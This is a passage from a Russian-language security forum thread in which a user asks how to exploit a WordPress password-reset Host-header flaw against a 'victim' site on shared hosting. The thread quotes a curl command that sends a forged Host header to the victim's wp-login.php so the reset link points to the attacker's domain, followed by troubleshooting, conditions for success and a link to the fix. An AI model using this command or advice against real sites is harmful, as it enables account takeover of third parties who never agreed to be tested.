HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
Перезагрузить страницу Подскажите как воспользоваться уязвимостью Wordpress
   
Ответ
Страница 2 из 2 < 1 2
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 06.11.2017, 02:54
itprepod
Guest
Сообщений: n/a
Провел на форуме:
1868

Репутация: 0
По умолчанию
Цитата:
Сообщение от crlf  
crlf said:

curl -H "Host: forhackwp.ru" --data "user_login=admin&redirect_to=&wp-submit=Get+New+Password"
http://тут-домен-жертвы/wp-login.php?action=lostpassword
Сделал запрос. Пишет в терминале:

404 File not found.

Так и должно быть?
 
Ответить с цитированием

  #12  
Старый 06.11.2017, 02:56
crlf
Guest
Сообщений: n/a
Провел на форуме:
169212

Репутация: 441
По умолчанию
Цитата:
Сообщение от itprepod  
itprepod said:

Так и должно быть?
Нет.
 
Ответить с цитированием

  #13  
Старый 06.11.2017, 03:04
itprepod
Guest
Сообщений: n/a
Провел на форуме:
1868

Репутация: 0
По умолчанию
Цитата:
Сообщение от crlf  
crlf said:

Совета по обновилению WP до последней версии, будет достаточно.
Нет. Письмо улетит админу, но в линках и заголовках будет домен атакующего.
Так же, должны быть соблюдены условия для успешной эксплуатации.
написал в личку
 
Ответить с цитированием

  #14  
Старый 06.11.2017, 03:08
crlf
Guest
Сообщений: n/a
Провел на форуме:
169212

Репутация: 441
По умолчанию
Цитата:
Сообщение от itprepod  
itprepod said:

написал в личку
ответил
 
Ответить с цитированием

  #15  
Старый 06.11.2017, 07:54
M_script
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512

Репутация: 0
По умолчанию
Цитата:
Сообщение от itprepod  
itprepod said:

Так и должно быть?
Сайт должен быть доступен по IP. На хостингах и нормально настроенных серверах не сработает.

Цитата:
Сообщение от crlf  
crlf said:

Совета по обновилению WP до последней версии, будет достаточно.
Последняя версия 4.8.3. Она уязвима, если верить ссылке из первого поста.
 
Ответить с цитированием

  #16  
Старый 06.11.2017, 12:30
itprepod
Guest
Сообщений: n/a
Провел на форуме:
1868

Репутация: 0
По умолчанию
Цитата:
Сообщение от M_script  
M_script said:

Сайт должен быть доступен по IP. На хостингах и нормально настроенных серверах не сработает.
Да, сайт жертвы на хостинге, как и большинство сайтов по сути.
 
Ответить с цитированием

  #17  
Старый 07.11.2017, 01:06
crlf
Guest
Сообщений: n/a
Провел на форуме:
169212

Репутация: 441
По умолчанию
Цитата:
Сообщение от M_script  
M_script said:

Последняя версия 4.8.3. Она уязвима, если верить ссылке из первого поста.
Кстати, да. Кривым взлядом, принял патч за обновление Кому нужно, можете пропатчиться:

https://core.trac.wordpress.org/atta...017-8295.patch
 
Ответить с цитированием
Ответ
Страница 2 из 2 < 1 2



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ